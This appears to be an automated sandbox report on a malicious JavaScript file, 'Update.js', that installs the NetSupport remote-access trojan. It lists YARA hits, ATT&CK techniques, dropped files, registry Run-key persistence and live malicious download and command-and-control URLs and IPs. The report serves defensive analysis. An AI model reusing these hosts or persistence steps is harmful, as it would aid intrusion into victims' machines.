Source: Yara match	File source: 5.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3110380129.0000000003082000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3112198355.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3112145975.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2366516566.0000000005976000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3109458678.00000000006B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3108971524.00000000006B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2064378537.00000000006B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2366162151.0000000005946000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3111648585.0000000005995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3112664746.000000006C680000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.2045118939.00000000006B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3110380129.000000000306F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2366408440.0000000005946000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\o2xqxqs\client32.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\o2xqxqs\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\o2xqxqs\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\ProgramData\o2xqxqs\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\o2xqxqs\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\o2xqxqs\PCICL32.DLL, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	2 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 Input Capture	12 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	4 Native API	1 DLL Side-Loading	2 Valid Accounts	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	2 Valid Accounts	21 Access Token Manipulation	5 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	1 Windows Service	1 Windows Service	1 Software Packing	NTDS	36 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Registry Run Keys / Startup Folder	113 Process Injection	1 DLL Side-Loading	LSA Secrets	251 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	1 File Deletion	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	113 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
C:\ProgramData\o2xqxqs\HTCTL32.DLL	13%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\o2xqxqs\PCICHEK.DLL	5%	ReversingLabs
C:\ProgramData\o2xqxqs\PCICL32.DLL	17%	ReversingLabs
C:\ProgramData\o2xqxqs\TCCTL32.DLL	6%	ReversingLabs
C:\ProgramData\o2xqxqs\client32.exe	27%	ReversingLabs	Win32.Trojan.NetSupport
C:\ProgramData\o2xqxqs\msvcr100.dll	0%	ReversingLabs
C:\ProgramData\o2xqxqs\pcicapi.dll	3%	ReversingLabs
C:\ProgramData\o2xqxqs\remcmdstub.exe	29%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
https://studioclic53.com/work/fix2.php?5436	100%	Avira URL Cloud	malware
http://194.180.191.64/fakeurl.htm	0%	Avira URL Cloud	safe
https://studioclic53.com/	100%	Avira URL Cloud	malware
https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight	0%	Avira URL Cloud	safe
https://studioclic53.com/work/yyy.zip?5668	100%	Avira URL Cloud	malware
http://0.30000000000000004.com/	0%	Avira URL Cloud	safe
https://jsbench.me/2vkpcekkvw/1)	0%	Avira URL Cloud	safe
https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf	0%	Avira URL Cloud	safe
https://jsperf.com/try-catch-performance-overhead	0%	Avira URL Cloud	safe
https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
geo.netsupportsoftware.com	104.26.1.231	true	false		high
studioclic53.com	79.141.173.158	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://geo.netsupportsoftware.com/location/loca.asp	false		high
https://studioclic53.com/work/fix2.php?5436	true	Avira URL Cloud: malware	unknown
http://194.180.191.64/fakeurl.htm	true	Avira URL Cloud: safe	unknown
https://studioclic53.com/work/yyy.zip?5668	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/apache/incubator-echarts/issues/11369	wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://code.google.com/p/chromium/issues/detail?id=449857	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js	wscript.exe, 00000000.00000003.1823797215.00000291B5DC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B6ABB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://jsperf.com/try-catch-performance-overhead	wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jsbench.me/2vkpcekkvw/1)	wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1823797215.00000291B53C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/testpage.htm	client32.exe	false		high
https://code.google.com/p/chromium/issues/detail?id=378607	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js	wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://promisesaplus.com/#point-75	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
http://jsperf.com/getall-vs-sizzle/2	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)	wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://%s/fakeurl.htm	client32.exe	false		high
https://bugs.webkit.org/show_bug.cgi?id=29084	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
http://dev.w3.org/csswg/cssom/#resolved-values	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/apache/incubator-echarts/issues/12229	wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js	wscript.exe, 00000000.00000003.1823797215.00000291B5DC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B6ABB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight	wscript.exe, 00000000.00000003.1823797215.00000291B5DC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B6ABB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/jquery/jquery/pull/557)	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://studioclic53.com/	wscript.exe, 00000000.00000003.1936184278.00000291B3E0B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=687787	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf	wscript.exe, 00000000.00000003.1823797215.00000291B5DC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B6ABB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/jquery/jquery/pull/764	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).	wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1823797215.00000291B53C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://code.google.com/p/chromium/issues/detail?id=333868	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://promisesaplus.com/#point-64	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www-googleapis-staging.sandbox.google.com	wscript.exe, 00000000.00000003.1937556791.00000291BB55E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937184802.00000291BB360000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937411672.00000291BB45F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937641081.00000291BB661000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js	wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1823797215.00000291B53C8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://promisesaplus.com/#point-61	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js	wscript.exe, 00000000.00000003.1823797215.00000291B5DC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B6ABB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	wscript.exe, 00000000.00000003.1823797215.00000291B53C8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p	wscript.exe, 00000000.00000003.1937556791.00000291BB55E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937184802.00000291BB360000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937411672.00000291BB45F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937641081.00000291BB661000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en-US/chrome/blank.html	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937184802.00000291BB360000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937411672.00000291BB45F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1937641081.00000291BB661000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=649285	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/apache/echarts/issues/14266	wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://promisesaplus.com/#point-59	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://promisesaplus.com/#point-57	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
http://0.30000000000000004.com/	wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1823797215.00000291B53C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1	client32.exe	false		high
https://promisesaplus.com/#point-54	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://momentjs.com/	wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1823797215.00000291B53C8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/CSS/display	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperation	wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1823797215.00000291B53C8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://promisesaplus.com/#point-48	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/ecomfe/zrender/blob/master/LICENSE.txt	wscript.exe, 00000000.00000003.1825096613.00000291B4D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1825870571.00000291B60BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1823797215.00000291B53C8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=491668	wscript.exe, 00000000.00000003.1936895814.00000291BB261000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
79.141.173.158	studioclic53.com	Bulgaria	201525	HZ-CA-ASBG	true
194.180.191.64	unknown	unknown	39798	MIVOCLOUDMD	true
104.26.1.231	geo.netsupportsoftware.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1563958
Start date and time:	2024-11-27 16:28:22 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Update.js
Detection:	MAL
Classification:	mal100.rans.evad.winJS@4/28@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 77% Number of executed functions: 42 Number of non-executed functions: 331
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Update.js

Simulations

Behavior and APIs

Time	Type	Description
10:30:24	API Interceptor	3938862x Sleep call for process: client32.exe modified
15:29:42	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run C:\ProgramData\o2xqxqs\client32.exe
15:29:51	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run C:\ProgramData\o2xqxqs\client32.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.1.231	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	Pyyidau.vbs	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	geo.netsupportsoftware.com/location/loca.asp
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	geo.netsupportsoftware.com/location/loca.asp
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	NeftPaymentError_Emdtd22102024_jpg.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	NeftPaymentError_Emdtd22102024_jpg.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geo.netsupportsoftware.com	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	Pyyidau.vbs	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	Pyyidau.vbs	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	KC0uZWwr8p.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	104.26.0.231
	KC0uZWwr8p.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	104.26.0.231
	72BF1aHUKl.msi	Get hash	malicious	NetSupport RAT	Browse	172.67.68.212
	hkpqXovZtS.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MIVOCLOUDMD	eBHn6qHPLz.exe	Get hash	malicious	Remcos	Browse	5.181.159.153
	eBHn6qHPLz.exe	Get hash	malicious	Remcos	Browse	5.181.159.153
	I2BJhmJou4.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	I5jG2Os8GA.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	OlZzqwjrwO.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	Vd3tOP5WSD.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	g1kWKm20Z5.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	cgln32y2HF.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	4Oq9i3gm0g.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	RX7nieXlNm.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.160.80
	https://u48163729.ct.sendgrid.net/asm/unsubscribe/?user_id=48163729&data=qT-heXtA7ZLJmT4BJi19dBW-F-CXFSQSXpQBDcn_B11oMDAwdTAwMGQ0UYQay-2m1MGetl5H1zhJ7V0f5P54qwp7W7awTzuKGgRnpdgDl_E6eI6svbuA2oFjPNqOehoJ5K6aC-71V-OiZCXoEP-70SvTqa9fXEqFAOZKLWm7RZ5RLI7tKn8pGSpDCqkmi7JNYfm2Q7yki1yC4KDnVExrLzS5Dinpc3_O3YyibytdyeBbGLzQNQe35YqdQXT6eoVRcZNPnhOk_bvZ2pKsC-MF72kahCC1iQeB0srI7lr7TNqU9FsU4BLkpOmkuAz8X5faeLDFrB36YDanhaeR-j4JxmsulyJTC5oJDvuhWKAzBQ5EbWDkut5hH9b1EKGWktLLdByuYC55z2GHZsqYI7H3p1bD0JWPzF8FhwoUpz66RLZWutJyKGbv9g8	Get hash	malicious	Unknown	Browse	1.1.1.1
	FW_ Fwd_ Voice Mail Message - 5TH Judicial Circuit.eml	Get hash	malicious	Lure-BasedAttack, HTMLPhisher	Browse	104.21.81.82
	https://chellenpunion.wordpress.com/	Get hash	malicious	Unknown	Browse	104.21.51.219
	https://multikultural.az/web/v2/index.php?query=bWVubmVuQHNlbmlvcnNvbHV0aW9uc3Z0Lm9yZw==	Get hash	malicious	Unknown	Browse	104.17.31.174
	Purchase Order PO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.158.106
	http://secureverificationbooking.com/p/680450950	Get hash	malicious	Unknown	Browse	172.67.151.211
	https://application-submit.com/form/redbull	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://application-submit.com/form/redbull	Get hash	malicious	Unknown	Browse	104.26.9.44
	http://secureverificationbooking.com/p/680450950	Get hash	malicious	Unknown	Browse	172.67.151.211
HZ-CA-ASBG	https://www.louisvillesports.org/	Get hash	malicious	Unknown	Browse	79.141.173.31
	grB3D6ImzT.dll	Get hash	malicious	Wannacry	Browse	79.141.173.214
	x7obCEqW1Q.dll	Get hash	malicious	Unknown	Browse	5.149.253.45
	6f57eb37bff30df1a66f848cb648799536dcbc05f6fb3.dll	Get hash	malicious	IcedID	Browse	5.149.252.179
	4af51e1230519e63f96e7dbbbd8b688575bddd2c33bbf.dll	Get hash	malicious	IcedID	Browse	5.149.252.179
	352fbf0bc54cdd36e9241b632267002e0cb9568505e9e.dll	Get hash	malicious	IcedID	Browse	5.149.252.179
	c6d47c1f4051999dda951902c21130bf7a95982fb9a8e.dll	Get hash	malicious	IcedID	Browse	5.149.252.179
	9beb1b3b4e8b86c245f0088e5aaef7a123650668607ec.dll	Get hash	malicious	IcedID	Browse	5.149.252.179
	235b4aef916cfe2b8c63778d22b79340d96bfa09354f6.dll	Get hash	malicious	IcedID	Browse	5.149.252.179
	dd6d136055296abfc6f94c8ae1d039042c603fb1d0938.dll	Get hash	malicious	IcedID	Browse	5.149.252.179

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	z34SOLICITUDDEP.vbs	Get hash	malicious	Remcos, GuLoader	Browse	79.141.173.158
	SERV27THNOVSCANNEDcopiesACCOUNT-SUMMARYcon3-2.vbs	Get hash	malicious	GuLoader, Remcos	Browse	79.141.173.158
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	79.141.173.158
